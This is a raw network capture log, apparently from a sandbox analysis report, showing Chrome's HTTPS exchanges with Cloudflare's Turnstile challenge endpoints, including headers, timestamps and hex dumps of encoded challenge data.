                                                                              2025-01-10 20:41:49 UTC16384OUTData Raw: 76 5f 38 66 66 66 37 64 35 32 34 63 34 36 38 63 39 35 3d 75 6b 70 49 34 6d 50 56 51 41 6b 2d 6b 2d 63 6b 50 4a 50 41 4b 65 44 56 6d 24 50 42 2d 53 49 50 57 64 73 2d 56 49 59 57 50 42 6a 2d 30 42 2d 75 70 6d 43 2d 79 41 4e 2d 64 65 49 2d 42 2d 33 37 65 4a 36 30 2d 55 50 49 6d 48 2d 4b 4d 49 56 37 2d 59 53 2d 48 62 2d 50 53 71 45 2d 75 4e 4c 61 4e 4a 47 43 34 2d 50 74 7a 49 4a 37 46 45 2d 55 70 34 70 72 7a 49 50 30 2d 6a 49 64 37 2d 76 72 42 49 49 2d 64 59 2d 64 46 70 2d 64 54 34 36 2d 24 57 4e 78 75 43 32 33 79 54 73 66 2d 64 6a 78 38 69 50 51 48 32 52 2d 50 55 73 78 49 32 4a 41 25 32 62 70 53 2d 41 54 76 6c 64 6b 5a 6d 75 31 53 2d 70 57 50 6b 49 73 24 38 31 65 53 6b 45 42 56 24 35 30 59 2d 31 4c 59 71 48 55 75 68 7a 68 61 74 54 58 73 66 30 4b 75 4f 4f 39
                                                                              Data Ascii: v_8fff7d524c468c95=ukpI4mPVQAk-k-ckPJPAKeDVm$PB-SIPWds-VIYWPBj-0B-upmC-yAN-deI-B-37eJ60-UPImH-KMIV7-YS-Hb-PSqE-uNLaNJGC4-PtzIJ7FE-Up4przIP0-jId7-vrBII-dY-dFp-dT46-$WNxuC23yTsf-djx8iPQH2R-PUsxI2JA%2bpS-ATvldkZmu1S-pWPkIs$81eSkEBV$50Y-1LYqHUuhzhatTXsf0KuOO9
                                                                              2025-01-10 20:41:49 UTC16201OUTData Raw: 59 53 59 49 32 53 6d 70 68 30 2d 47 67 71 63 24 65 6d 64 2d 53 50 69 4f 55 2d 75 49 59 34 49 50 2d 57 65 64 4a 50 77 4a 7a 2d 44 30 2d 38 2d 59 65 4a 6b 50 61 2d 47 49 4a 63 50 2b 2d 50 4a 6d 41 2d 7a 2d 56 53 6d 49 2d 4c 2d 35 59 68 4a 2d 51 49 71 2d 64 24 50 2b 2d 4b 2d 59 33 57 4c 37 52 32 49 53 2d 6e 2d 52 65 6d 52 2d 36 43 70 5a 2d 73 2d 58 4b 47 2d 50 2d 50 36 39 46 65 2d 6c 2b 45 66 55 53 59 2d 2d 46 2d 4e 54 2d 51 6d 46 6c 44 49 44 51 76 78 79 55 4e 49 70 4d 58 33 6d 49 55 76 76 65 2d 6c 4f 67 51 64 61 56 4b 52 2d 51 64 7a 76 77 7a 69 62 50 42 2d 4a 34 65 30 30 61 2d 75 66 4a 42 49 43 2d 6e 65 59 6b 6d 65 2d 50 49 70 4a 64 56 68 55 76 4e 36 78 6b 6b 6d 65 55 52 65 45 56 55 49 55 2d 2d 34 53 44 4f 67 44 50 50 4e 74 55 62 30 45 4a 72 55 56 64 6b 64
                                                                              Data Ascii: YSYI2Smph0-Ggqc$emd-SPiOU-uIY4IP-WedJPwJz-D0-8-YeJkPa-GIJcP+-PJmA-z-VSmI-L-5YhJ-QIq-d$P+-K-Y3WL7R2IS-n-RemR-6CpZ-s-XKG-P-P69Fe-l+EfUSY--F-NT-QmFlDIDQvxyUNIpMX3mIUvve-lOgQdaVKR-QdzvwzibPB-J4e00a-ufJBIC-neYkme-PIpJdVhUvN6xkkmeUReEVUIU--4SDOgDPPNtUb0EJrUVdkd
                                                                              2025-01-10 20:41:50 UTC322INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:50 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 26344
                                                                              Connection: close
                                                                              cf-chl-gen: oEZwMDUQEyBFMZipwqu+wnU9auUUMURRnweijTOaqUzX2GzeTgk7+9NIkc4N3ZVP$UryIIbpuHSwmpL4vnQZwtg==
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d7759d142b9-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:50 UTC1047INData Raw: 71 49 6d 33 73 5a 33 45 6d 70 42 36 74 36 57 4a 6d 49 61 37 69 70 79 62 79 35 47 55 69 36 6d 56 6d 49 2b 6c 31 59 36 50 32 39 57 63 73 73 2b 63 73 4c 44 51 74 71 53 2f 30 2b 71 70 36 73 54 4f 73 4c 71 36 37 72 54 4c 38 37 47 30 35 62 53 7a 75 66 6e 59 33 72 2f 77 79 72 37 44 33 74 4c 5a 30 2b 50 6b 36 73 76 6d 31 73 76 51 44 68 44 4b 7a 2f 59 45 46 75 54 6b 44 4d 33 63 39 53 44 59 38 66 49 51 49 50 44 77 45 66 72 6a 47 66 33 6a 39 42 34 42 44 2b 34 4c 2b 69 33 77 36 78 59 71 41 68 45 4b 4e 2f 77 71 50 44 50 38 45 7a 41 2b 45 52 45 31 45 51 6c 48 4f 45 63 64 47 44 6b 4d 4a 68 30 76 4c 44 31 49 52 46 46 42 4f 55 34 6f 55 6b 39 61 59 53 6f 55 56 54 77 33 48 44 35 69 4a 69 42 55 4b 43 73 32 53 6d 34 77 58 6c 39 54 4d 69 39 71 4d 31 4a 4c 4e 6a 70 64 50 56 73
                                                                              Data Ascii: qIm3sZ3EmpB6t6WJmIa7ipyby5GUi6mVmI+l1Y6P29Wcss+csLDQtqS/0+qp6sTOsLq67rTL87G05bSzufnY3r/wyr7D3tLZ0+Pk6svm1svQDhDKz/YEFuTkDM3c9SDY8fIQIPDwEfrjGf3j9B4BD+4L+i3w6xYqAhEKN/wqPDP8EzA+ERE1EQlHOEcdGDkMJh0vLD1IRFFBOU4oUk9aYSoUVTw3HD5iJiBUKCs2Sm4wXl9TMi9qM1JLNjpdPVs
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 52 73 4e 43 58 78 4d 47 7a 71 64 47 56 70 39 4c 42 7a 63 44 51 7a 64 4c 66 33 72 2b 33 6f 63 57 35 75 36 58 4a 7a 62 2b 70 7a 4f 66 44 72 64 43 77 78 37 48 57 30 39 6e 58 32 65 2f 50 75 64 37 6b 77 63 37 66 38 65 4c 57 31 2b 63 48 35 39 73 51 43 68 48 53 46 41 34 49 35 78 6e 6c 7a 41 76 63 43 78 66 72 36 78 44 75 33 68 48 66 4a 66 6a 6b 39 52 59 66 49 41 67 4a 4b 2b 49 75 4a 66 49 65 44 77 59 55 49 68 4d 50 2b 78 59 4c 45 51 77 71 47 78 67 31 4e 77 38 51 51 78 55 6b 4b 78 5a 44 47 78 6f 65 53 68 31 55 49 6b 30 74 57 43 5a 52 4b 6a 67 79 53 69 38 75 4e 6a 77 36 48 44 55 66 59 43 42 57 4d 31 51 6e 51 54 63 6c 5a 45 67 38 54 44 73 76 64 6b 31 47 5a 57 6c 4f 61 58 73 35 61 33 52 73 67 54 74 4d 50 34 5a 61 4f 58 64 46 66 46 68 2f 62 6d 5a 33 65 58 42 75 54 32
                                                                              Data Ascii: RsNCXxMGzqdGVp9LBzcDQzdLf3r+3ocW5u6XJzb+pzOfDrdCwx7HW09nX2e/Pud7kwc7f8eLW1+cH59sQChHSFA4I5xnlzAvcCxfr6xDu3hHfJfjk9RYfIAgJK+IuJfIeDwYUIhMP+xYLEQwqGxg1Nw8QQxUkKxZDGxoeSh1UIk0tWCZRKjgySi8uNjw6HDUfYCBWM1QnQTclZEg8TDsvdk1GZWlOaXs5a3RsgTtMP4ZaOXdFfFh/bmZ3eXBuT2
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 6c 39 6a 61 30 72 43 58 71 5a 6e 52 75 72 6e 67 35 71 4b 6b 32 37 76 41 32 63 61 72 71 75 76 76 34 64 58 69 37 38 50 44 34 76 6d 34 2b 64 69 32 75 73 6a 2b 41 2f 58 66 37 64 4c 6b 36 64 2f 53 42 37 34 4a 42 76 76 64 44 76 41 53 2f 41 2f 33 46 50 6e 36 46 4e 6e 57 2b 74 67 65 46 4e 4d 66 49 50 59 54 49 50 50 7a 2f 43 62 6e 34 67 50 36 4a 53 49 74 4a 50 7a 6d 4d 41 38 4d 4e 52 6b 76 2b 51 6b 59 4b 78 62 35 4c 42 49 42 52 41 34 42 42 69 41 5a 51 77 77 6c 52 30 67 70 49 67 30 52 4e 52 31 44 55 43 51 6a 46 42 55 5a 44 31 39 53 48 6b 31 59 4e 53 45 63 51 46 4d 2b 49 6b 59 36 4b 57 77 32 4b 6a 42 64 57 32 63 78 4a 31 64 44 62 57 70 31 61 33 74 59 63 56 4a 5a 4f 33 78 2f 63 6c 74 61 68 31 39 2f 64 6d 78 56 62 6d 78 70 57 30 4f 52 53 32 70 78 6b 56 46 56 6a 59 32
                                                                              Data Ascii: l9ja0rCXqZnRurng5qKk27vA2carquvv4dXi78PD4vm4+di2usj+A/Xf7dLk6d/SB74JBvvdDvAS/A/3FPn6FNnW+tgeFNMfIPYTIPPz/Cbn4gP6JSItJPzmMA8MNRkv+QkYKxb5LBIBRA4BBiAZQwwlR0gpIg0RNR1DUCQjFBUZD19SHk1YNSEcQFM+IkY6KWw2KjBdW2cxJ1dDbWp1a3tYcVJZO3x/cltah19/dmxVbmxpW0ORS2pxkVFVjY2
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 71 37 50 6f 4e 76 6c 30 65 66 68 36 4b 72 72 35 64 2b 75 37 2b 6e 69 73 76 50 74 36 62 62 33 38 65 79 36 2b 2f 58 7a 7a 4e 6e 36 41 2b 36 32 38 50 33 7a 36 66 62 39 38 2b 76 39 37 63 73 41 32 63 7a 52 36 2f 51 50 31 73 72 30 47 51 2f 4f 46 50 62 79 39 76 7a 61 33 79 48 66 4a 75 51 6d 48 78 33 72 44 74 2f 6d 4b 51 73 6a 49 4f 73 51 4b 51 58 32 39 75 73 47 46 67 63 53 4c 6b 45 53 4d 79 77 50 4f 52 6b 69 46 43 49 66 42 7a 59 6c 47 77 73 65 41 78 49 4c 50 53 30 33 52 45 35 5a 4b 53 39 51 53 43 70 4b 55 31 51 38 50 56 45 6a 52 47 49 37 4a 53 6c 4b 4b 53 70 4a 62 6d 73 39 52 30 78 76 51 57 56 51 63 30 56 74 56 48 64 4a 58 31 68 37 54 57 31 63 66 31 47 48 50 31 52 6c 67 47 53 48 57 55 64 6c 61 46 31 67 53 6d 31 71 68 47 6d 47 64 57 36 44 6c 6e 52 79 68 35 5a 58
                                                                              Data Ascii: q7PoNvl0efh6Krr5d+u7+nisvPt6bb38ey6+/XzzNn6A+628P3z6fb98+v97csA2czR6/QP1sr0GQ/OFPby9vza3yHfJuQmHx3rDt/mKQsjIOsQKQX29usGFgcSLkESMywPORkiFCIfBzYlGwseAxILPS03RE5ZKS9QSCpKU1Q8PVEjRGI7JSlKKSpJbms9R0xvQWVQc0VtVHdJX1h7TW1cf1GHP1RlgGSHWUdlaF1gSm1qhGmGdW6DlnRyh5ZX
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 53 34 32 37 76 58 75 38 61 6e 73 4b 7a 4b 79 4d 6e 7a 30 66 54 59 75 4c 69 7a 76 4c 6a 57 30 66 7a 79 75 72 38 43 32 41 44 44 42 63 50 47 79 41 72 36 78 73 6f 52 33 63 51 47 36 51 4d 42 34 2b 50 73 45 39 6a 4f 38 2f 66 76 47 41 50 73 46 68 62 38 41 68 67 45 4a 77 72 6c 48 50 58 6c 36 66 6b 49 38 69 55 32 4d 52 4c 75 38 79 30 47 38 2b 34 61 46 78 55 57 51 42 35 42 41 41 59 58 41 50 6f 34 49 30 63 6f 4a 68 73 64 55 44 46 4d 45 51 63 4e 4e 43 4d 76 45 46 6f 6e 44 7a 59 35 4b 6b 30 78 58 43 4a 55 4d 57 59 31 5a 69 68 6f 4c 46 70 42 61 79 31 77 53 57 63 2f 63 58 4e 6f 51 58 55 35 54 6a 78 70 5a 33 6f 37 53 56 35 64 51 6c 35 64 63 31 46 52 69 47 64 58 56 57 56 47 57 6f 35 61 58 30 5a 74 56 4a 46 68 62 6c 68 4e 57 55 39 78 6b 32 71 51 6c 35 56 68 6c 48 32 61 57
                                                                              Data Ascii: S427vXu8ansKzKyMnz0fTYuLizvLjW0fzyur8C2ADDBcPGyAr6xsoR3cQG6QMB4+PsE9jO8/fvGAPsFhb8AhgEJwrlHPXl6fkI8iU2MRLu8y0G8+4aFxUWQB5BAAYXAPo4I0coJhsdUDFMEQcNNCMvEFonDzY5Kk0xXCJUMWY1ZihoLFpBay1wSWc/cXNoQXU5TjxpZ3o7SV5dQl5dc1FRiGdXVWVGWo5aX0ZtVJFhblhNWU9xk2qQl5VhlH2aW
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 2f 75 65 72 67 77 61 62 46 38 38 62 51 35 75 79 33 2b 63 7a 32 76 67 48 36 41 37 38 42 41 77 4c 55 76 74 54 47 78 2f 76 36 43 4d 2f 6e 37 52 48 4f 33 2b 45 44 36 2b 49 4d 44 2b 73 63 48 77 33 7a 45 76 45 58 39 65 37 39 46 66 55 6c 38 52 54 6d 48 65 77 61 2b 4f 49 4e 4a 2f 49 68 4c 7a 67 4b 4e 67 30 76 2b 4f 37 30 48 76 34 59 4e 7a 63 52 39 6b 50 39 43 43 51 56 4f 52 6f 38 52 44 38 69 51 53 70 45 44 68 39 49 52 69 6c 4b 4a 6b 63 77 4d 79 35 63 4c 7a 6c 50 56 53 42 69 4e 56 38 6e 61 57 4e 72 4b 47 6c 72 61 6a 30 6e 50 53 38 77 5a 47 4e 77 4f 46 42 57 65 54 64 47 64 47 64 53 57 32 4a 37 56 58 56 6c 63 56 6c 35 61 6e 31 65 66 57 4a 39 5a 47 75 54 67 32 65 55 54 57 5a 55 62 34 4f 61 57 5a 70 79 6c 31 2b 64 69 35 78 69 66 70 4f 6c 57 70 57 4b 69 6d 6c 6a 69 57
                                                                              Data Ascii: /uergwabF88bQ5uy3+cz2vgH6A78BAwLUvtTGx/v6CM/n7RHO3+ED6+IMD+scHw3zEvEX9e79FfUl8RTmHewa+OINJ/IhLzgKNg0v+O70Hv4YNzcR9kP9CCQVORo8RD8iQSpEDh9IRilKJkcwMy5cLzlPVSBiNV8naWNrKGlraj0nPS8wZGNwOFBWeTdGdGdSW2J7VXVlcVl5an1efWJ9ZGuTg2eUTWZUb4OaWZpyl1+di5xifpOlWpWKimljiW
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 36 63 66 34 34 2b 76 4d 37 50 76 31 30 41 48 4e 38 74 58 65 7a 66 72 59 2b 4e 55 43 33 74 59 41 2f 74 2f 71 37 51 72 6a 33 67 41 49 36 65 49 49 46 65 33 32 36 51 33 76 45 66 45 54 39 66 34 55 47 76 6b 44 4b 42 2f 39 42 77 49 67 41 76 6f 53 49 77 55 31 45 69 30 4c 41 78 6f 74 44 52 63 4f 4c 68 45 62 45 6a 6b 56 52 52 70 42 47 54 6b 65 51 42 34 58 4a 6a 30 68 4b 78 35 48 4a 69 39 55 53 79 67 6a 4f 6c 45 74 58 55 78 54 4d 53 74 55 57 6a 63 76 55 46 73 35 51 7a 5a 63 50 57 31 63 58 55 49 37 59 47 31 46 64 57 42 70 53 56 4e 4f 61 30 31 48 55 6e 42 53 57 34 42 34 56 56 39 34 64 31 70 54 57 6e 35 63 56 34 43 41 59 31 74 38 67 32 5a 66 68 49 78 70 63 33 71 4a 62 6d 64 32 6d 58 46 72 6b 4a 4a 31 62 34 4b 59 65 6f 4e 32 6f 58 79 48 72 4b 4f 41 73 59 36 6c 68 61 57
                                                                              Data Ascii: 6cf44+vM7Pv10AHN8tXezfrY+NUC3tYA/t/q7Qrj3gAI6eIIFe326Q3vEfET9f4UGvkDKB/9BwIgAvoSIwU1Ei0LAxotDRcOLhEbEjkVRRpBGTkeQB4XJj0hKx5HJi9USygjOlEtXUxTMStUWjcvUFs5QzZcPW1cXUI7YG1FdWBpSVNOa01HUnBSW4B4VV94d1pTWn5cV4CAY1t8g2ZfhIxpc3qJbmd2mXFrkJJ1b4KYeoN2oXyHrKOAsY6lhaW
                                                                              2025-01-10 20:41:50 UTC1369INData Raw: 50 66 39 30 73 67 41 41 38 36 36 2b 39 76 62 42 41 44 68 33 2b 59 4d 37 4d 55 51 35 4e 4c 6e 37 68 54 79 7a 52 6a 73 32 75 2f 32 48 50 44 75 2b 66 55 64 37 52 54 66 48 50 76 77 49 43 58 38 48 76 7a 72 36 7a 4c 35 42 51 66 2b 4b 43 77 4d 4a 6a 4d 77 45 41 55 30 4f 52 45 78 49 6b 49 58 44 54 51 79 42 44 6f 53 48 52 38 57 47 6b 38 63 42 30 67 72 4b 45 51 74 46 43 51 6b 4b 6a 51 77 4e 31 77 78 4c 7a 6b 5a 58 53 38 2b 48 54 73 37 4d 57 68 57 4e 32 31 73 52 6a 39 64 55 6e 45 2f 5a 58 52 4b 54 46 4e 34 55 55 74 57 53 6e 6c 4d 57 6a 6c 62 56 30 35 4f 63 6c 53 4a 69 47 5a 62 65 57 36 4e 57 70 47 51 59 32 69 41 54 58 5a 4f 6d 59 74 62 61 34 6c 2b 6e 57 79 68 6f 49 4a 61 70 5a 64 6e 66 49 4f 6f 69 6d 4b 74 6f 32 39 2f 6e 5a 4b 78 67 48 2b 30 6c 6d 36 35 72 33 75 51
                                                                              Data Ascii: Pf90sgAA866+9vbBADh3+YM7MUQ5NLn7hTyzRjs2u/2HPDu+fUd7RTfHPvwICX8Hvzr6zL5BQf+KCwMJjMwEAU0ORExIkIXDTQyBDoSHR8WGk8cB0grKEQtFCQkKjQwN1wxLzkZXS8+HTs7MWhWN21sRj9dUnE/ZXRKTFN4UUtWSnlMWjlbV05OclSJiGZbeW6NWpGQY2iATXZOmYtba4l+nWyhoIJapZdnfIOoimKto29/nZKxgH+0lm65r3uQ


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              24192.168.2.549796104.18.94.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:50 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:50 UTC442INHTTP/1.1 400 Bad Request
                                                                              Date: Fri, 10 Jan 2025 20:41:50 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 14
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: rgc36JCvgngPiKCBRgZTSwjzzuS1liOJLbIUADMBbNM56Xq0/Ls7wF2I7+5Fw/45QYbrB2QmAByb7eLL9g2AkA==$Ev+E3R2L7freJWUHz3j1OQ==
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d7d2fb51902-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:50 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                              Data Ascii: {"err":100230}


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              25192.168.2.549821104.18.95.414432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:55 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1267374137:1736539845:CrWD5AAFYEtqtUm0wbLWJ8rUW6pK4ln6I2Lp2JGR43Q/8fff7d524c468c95/AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 34966
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              CF-Chl-RetryAttempt: 0
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: AqAVM.prNMuy0uUMTpM5UtrhJs4VnecbRdjPdsh0LAU-1736541704-1.1.1.1-T20QuyMjqABcoklBq3Ltj2tjZqq22Q5zib_dbww6GA7bA.dw1eiZwMbExWZaN.zJ
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/8sr4r/0x4AAAAAAA5A5S2_7yImhOJ-/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:55 UTC16384OUTData Raw: 76 5f 38 66 66 66 37 64 35 32 34 63 34 36 38 63 39 35 3d 75 6b 70 49 34 6d 50 56 51 41 6b 2d 6b 2d 63 6b 50 4a 50 41 4b 65 44 56 6d 24 50 42 2d 53 49 50 57 64 73 2d 56 49 59 57 50 42 6a 2d 30 42 2d 75 70 6d 43 2d 79 41 4e 2d 64 65 49 2d 42 2d 33 37 65 4a 36 30 2d 55 50 49 6d 48 2d 4b 4d 49 56 37 2d 59 53 2d 48 62 2d 50 53 71 45 2d 75 4e 4c 61 4e 4a 47 43 34 2d 50 74 7a 49 4a 37 46 45 2d 55 70 34 70 72 7a 49 50 30 2d 6a 49 64 37 2d 76 72 42 49 49 2d 64 59 2d 64 46 70 2d 64 54 34 36 2d 24 57 4e 78 75 43 32 33 79 54 73 66 2d 64 6a 78 38 69 50 51 48 32 52 2d 50 55 73 78 49 32 4a 41 25 32 62 70 53 2d 41 54 76 6c 64 6b 5a 6d 75 31 53 2d 70 57 50 6b 49 73 24 38 31 65 53 6b 45 42 56 24 35 30 59 2d 31 4c 59 71 48 55 75 68 7a 68 61 74 54 58 73 66 30 4b 75 4f 4f 39
                                                                              Data Ascii: v_8fff7d524c468c95=ukpI4mPVQAk-k-ckPJPAKeDVm$PB-SIPWds-VIYWPBj-0B-upmC-yAN-deI-B-37eJ60-UPImH-KMIV7-YS-Hb-PSqE-uNLaNJGC4-PtzIJ7FE-Up4przIP0-jId7-vrBII-dY-dFp-dT46-$WNxuC23yTsf-djx8iPQH2R-PUsxI2JA%2bpS-ATvldkZmu1S-pWPkIs$81eSkEBV$50Y-1LYqHUuhzhatTXsf0KuOO9
                                                                              2025-01-10 20:41:55 UTC16384OUTData Raw: 59 53 59 49 32 53 6d 70 68 30 2d 47 67 71 63 24 65 6d 64 2d 53 50 69 4f 55 2d 75 49 59 34 49 50 2d 57 65 64 4a 50 77 4a 7a 2d 44 30 2d 38 2d 59 65 4a 6b 50 61 2d 47 49 4a 63 50 2b 2d 50 4a 6d 41 2d 7a 2d 56 53 6d 49 2d 4c 2d 35 59 68 4a 2d 51 49 71 2d 64 24 50 2b 2d 4b 2d 59 33 57 4c 37 52 32 49 53 2d 6e 2d 52 65 6d 52 2d 36 43 70 5a 2d 73 2d 58 4b 47 2d 50 2d 50 36 39 46 65 2d 6c 2b 45 66 55 53 59 2d 2d 46 2d 4e 54 2d 51 6d 46 6c 44 49 44 51 76 78 79 55 4e 49 70 4d 58 33 6d 49 55 76 76 65 2d 6c 4f 67 51 64 61 56 4b 52 2d 51 64 7a 76 77 7a 69 62 50 42 2d 4a 34 65 30 30 61 2d 75 66 4a 42 49 43 2d 6e 65 59 6b 6d 65 2d 50 49 70 4a 64 56 68 55 76 4e 36 78 6b 6b 6d 65 55 52 65 45 56 55 49 55 2d 2d 34 53 44 4f 67 44 50 50 4e 74 55 62 30 45 4a 72 55 56 64 6b 64
                                                                              Data Ascii: YSYI2Smph0-Ggqc$emd-SPiOU-uIY4IP-WedJPwJz-D0-8-YeJkPa-GIJcP+-PJmA-z-VSmI-L-5YhJ-QIq-d$P+-K-Y3WL7R2IS-n-RemR-6CpZ-s-XKG-P-P69Fe-l+EfUSY--F-NT-QmFlDIDQvxyUNIpMX3mIUvve-lOgQdaVKR-QdzvwzibPB-J4e00a-ufJBIC-neYkme-PIpJdVhUvN6xkkmeUReEVUIU--4SDOgDPPNtUb0EJrUVdkd
                                                                              2025-01-10 20:41:55 UTC2198OUTData Raw: 50 5a 41 6b 32 33 46 6a 53 4c 6b 2b 79 47 59 49 70 61 51 5a 2d 71 56 75 53 4a 38 50 4b 2d 65 53 50 34 58 47 2d 54 43 77 71 33 56 2d 75 31 51 6c 2d 70 51 5a 35 72 53 35 32 65 72 65 44 53 50 71 51 77 42 34 54 47 48 2d 4b 65 50 64 7a 65 6e 4e 45 7a 51 36 4d 2d 64 31 79 43 4c 39 2d 7a 75 31 50 54 61 39 42 49 6d 47 50 46 52 30 30 2d 2b 54 6d 2d 50 4a 59 4b 50 65 42 36 2d 2d 68 75 64 2d 59 6d 45 49 50 4e 2d 6c 58 4f 53 50 52 43 4e 49 64 73 2b 37 2d 47 67 61 44 6d 4b 6d 67 2d 4a 62 50 2b 41 2b 46 6c 51 50 7a 4f 65 55 58 6b 50 65 43 42 2d 2d 55 4d 68 2d 7a 50 51 30 65 73 70 67 4a 2d 67 6c 32 4d 48 49 6d 73 50 59 2d 54 2d 4a 47 69 47 57 54 2d 59 76 51 24 54 72 5a 2b 4b 2d 33 49 47 56 41 38 50 32 4d 50 4a 4a 62 2d 7a 49 6c 61 54 24 2d 64 53 50 4f 6c 30 30 46 73 34
                                                                              Data Ascii: PZAk23FjSLk+yGYIpaQZ-qVuSJ8PK-eSP4XG-TCwq3V-u1Ql-pQZ5rS52ereDSPqQwB4TGH-KePdzenNEzQ6M-d1yCL9-zu1PTa9BImGPFR00-+Tm-PJYKPeB6--hud-YmEIPN-lXOSPRCNIds+7-GgaDmKmg-JbP+A+FlQPzOeUXkPeCB--UMh-zPQ0espgJ-gl2MHImsPY-T-JGiGWT-YvQ$TrZ+K-3IGVA8P2MPJJb-zIlaT$-dSPOl00Fs4
                                                                              2025-01-10 20:41:55 UTC282INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:41:55 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Content-Length: 4624
                                                                              Connection: close
                                                                              cf-chl-out: loPT7PkYT4G0XO5sT3vBdkadhYq0FTJvgHs3y0BldrJjbFqSWB7xS9CEU0ClrdsmSVEoLuUFtfNkhPgNOszOYhgMh1ccPHbdfpH0q1mgsSE=$jeIWAW5o27Jm5Jemps9MCA==
                                                                              2025-01-10 20:41:55 UTC1255INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 2d 73 3a 20 65 7a 2b 49 42 45 55 5a 7a 76 64 2b 71 53 47 68 49 37 59 65 36 37 4a 66 6b 41 6e 67 4f 30 4a 31 68 7a 77 70 49 6a 45 48 79 47 79 41 63 4b 35 56 7a 4e 41 5a 47 32 69 35 30 50 48 51 47 38 5a 57 73 51 4d 36 35 51 38 45 37 6b 79 4d 4e 39 72 56 71 34 54 6e 7a 68 76 6d 77 67 6b 5a 31 4b 2f 4d 53 61 50 33 51 64 4c 39 56 52 48 4e 6b 44 48 49 77 48 4c 44 57 69 6e 4c 50 51 56 61 77 43 66 56 2f 36 61 48 35 37 4f 4c 64 6c 6c 43 6d 78 68 36 49 46 53 6e 73 47 71 33 73 78 72 34 47 45 51 43 7a 33 72 4e 4d 44 71 6c 7a 57 36 4a 67 38 4c 43 38 55 79 4c 2b 6d 6d 67 6e 79 72 4a 43 73 2b 35 62 79 49 79 6a 4b 2b 35 32 54 4c 5a 35 46 6b 6e 68 61 51 4e 6b 6e 4b 6f 50 48 63 63 48 5a 7a 58 63 71 31 33 32 6d 77 71 38 79 7a 35 56 33 5a 69 62
                                                                              Data Ascii: cf-chl-out-s: ez+IBEUZzvd+qSGhI7Ye67JfkAngO0J1hzwpIjEHyGyAcK5VzNAZG2i50PHQG8ZWsQM65Q8E7kyMN9rVq4TnzhvmwgkZ1K/MSaP3QdL9VRHNkDHIwHLDWinLPQVawCfV/6aH57OLdllCmxh6IFSnsGq3sxr4GEQCz3rNMDqlzW6Jg8LC8UyL+mmgnyrJCs+5byIyjK+52TLZ5FknhaQNknKoPHccHZzXcq132mwq8yz5V3Zib
